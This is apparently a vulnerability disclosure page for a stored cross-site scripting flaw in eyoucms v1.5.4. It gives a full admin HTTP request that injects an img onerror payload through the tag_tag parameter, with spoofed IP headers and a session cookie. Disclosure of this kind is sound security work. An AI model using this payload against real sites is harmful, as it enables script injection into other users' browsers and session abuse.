代码拉取完成,页面将自动刷新
eyoucms v1.5.4 tag_tag parameter has a stored XSS vulnerability
POST /login.php?m=admin&c=Tags&a=edit&_ajax=1&lang=cn HTTP/1.1
Host: www.eyou.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 181
Origin: http://www.eyou.com
Connection: close
Referer: http://www.eyou.com/login.php?m=admin&c=Tags&a=edit&id=51&lang=cn
Cookie: home_lang=cn; admin_lang=cn; PHPSESSID=kc2ot9hcf8c1685heb8bt7k1n0; users_id=1; workspaceParam=switch_map%7CIndex; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_IS_UPHTML=0
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
id=51&tag_tag=%3Cimg+src%3D1+onerror%3Dalert(1)%3E&tag_tagold=%3Cimg+src%3D1+onerror%3Dalert(1)%3E&litpic_local=&litpic_remote=&tag_seo_title=&tag_seo_keywords=&tag_seo_description=
Add a tag tag

Click on the association to trigger XSS


此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。